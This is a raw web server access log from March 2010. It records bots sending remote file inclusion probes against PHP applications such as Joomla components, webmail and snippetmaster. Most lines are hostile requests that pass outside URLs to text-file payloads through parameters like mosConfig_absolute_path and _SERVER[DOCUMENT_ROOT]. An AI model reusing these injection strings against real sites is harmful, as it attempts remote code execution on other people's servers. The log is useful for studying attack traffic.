200.93.147.154 - - [05/Mar/2010:10:00:18 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:00:19 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:00:22 -0800] "GET /logs/access_100128.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:23 -0800] "GET /logs/access_100208.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:23 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:23 -0800] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:10:00:26 -0800] "GET /logs/access_100201.log//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:27 -0800] "GET /logs/access_100224.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:45 -0800] "GET /bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:45 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:45 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [05/Mar/2010:10:00:45 -0800] "GET /logs/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:10:00:56 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:10:00:56 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:10:00:56 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:10:00:57 -0800] "GET /logs/access_100207.log//bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:01:37 -0800] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:01:40 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:01:41 -0800] "GET /logs/access_100214.log%20%20/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:01:42 -0800] "GET /logs/access_100224.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:01:44 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:01:53 -0800] "GET /logs/access_100205.log%20%20/skin/zero_vote/error.php?dir=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:10:02:13 -0800] "GET /logs/access_100222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:10:02:18 -0800] "GET /logs/access_100222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:02:20 -0800] "GET /logs/access_100219.log%20%20//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:02:20 -0800] "GET /lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:10:02:37 -0800] "GET /logs/access_100222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:03:04 -0800] "GET /bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:03:04 -0800] "GET /logs/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:03:04 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:03:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:03:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:03:08 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:03:08 -0800] "GET /logs/access_100222.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:03:42 -0800] "GET /logs/access_100219.log/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:03:47 -0800] "GET /logs/access_100215.log/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:03:55 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:03:55 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:03:55 -0800] "GET /logs/access_100215.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:04 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:04 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:07 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:10 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:12 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:12 -0800] "GET /logs/access_100222.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:10:04:13 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:04:21 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:04:21 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:04:21 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:46 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:46 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:04:49 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:04:52 -0800] "GET /logs/access_100219.log/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:04:52 -0800] "GET /logs/access_100215.log/?INCLUDE_FOLDER=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:05:00 -0800] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:05:00 -0800] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:05:01 -0800] "GET /logs/access_100219.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:05:03 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:05:12 -0800] "GET /logs//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:05:12 -0800] "GET /lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:05:12 -0800] "GET /logs/access_100219.log%20%20//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:05:13 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:10:05:20 -0800] "GET /logs/access_100218.log HTTP/1.0" 200 1464129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:10:05:36 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:10:05:58 -0800] "GET /mcf.php?content=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:10:05:58 -0800] "GET /logs/mcf.php?content=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:06:07 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:06:15 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:06:15 -0800] "GET /logs/access_100215.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:10:06:15 -0800] "GET /logs/access.log%20%20/mcf.php?content=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:06:18 -0800] "GET /logs/access_100219.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:06:26 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:06:26 -0800] "GET /logs/access_100222.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:06:27 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:06:52 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:06:55 -0800] "GET /logs/access_100128.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:06:55 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:06:57 -0800] "GET /logs/access_100215.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:10:07:05 -0800] "GET /logs/access_100218.log/includes/ktedit/toolbar.php?dirDepth=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:10:07:05 -0800] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [05/Mar/2010:10:07:05 -0800] "GET /includes/ktedit/toolbar.php?dirDepth=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:10:07:12 -0800] "GET /logs/access_100225.log%20%20/mcf.php?content=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:10:07:30 -0800] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:07:38 -0800] "GET /logs/access_100208.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:07:40 -0800] "GET /logs/access_100224.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:07:44 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [05/Mar/2010:10:07:49 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:07:50 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:07:50 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:10:07:50 -0800] "GET /logs/access_100222.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sanvan.net/new/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:07:54 -0800] "GET /lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:07:54 -0800] "GET /logs//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:07:54 -0800] "GET /logs/access_100219.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:08:05 -0800] "GET /logs/access_100220.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:08:10 -0800] "GET /logs/access_100215.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:08:22 -0800] "GET /logs/access_100219.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:08:22 -0800] "GET /logs/access_100215.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:10:08:26 -0800] "GET /logs/access_100304.log HTTP/1.0" 200 1342688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:08:28 -0800] "GET /include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:08:28 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:08:28 -0800] "GET /logs//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:10:08:29 -0800] "GET /logs/access_100214.log%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:08:34 -0800] "GET /logs//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:08:34 -0800] "GET /include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [05/Mar/2010:10:08:34 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:10:08:37 -0800] "GET /logs/access_100305.log HTTP/1.0" 200 1387284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:10:08:37 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:10:08:41 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [05/Mar/2010:10:08:42 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://controlscan.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:08:53 -0800] "GET /logs/access_100220.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [05/Mar/2010:10:08:57 -0800] "GET /logs/access_100215.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
190.152.217.250 - - [05/Mar/2010:10:09:19 -0800] "GET /logs/access_100215.log//lukkana/index.php?option=com_search&Itemid=5//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST[option]=http://golgc.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
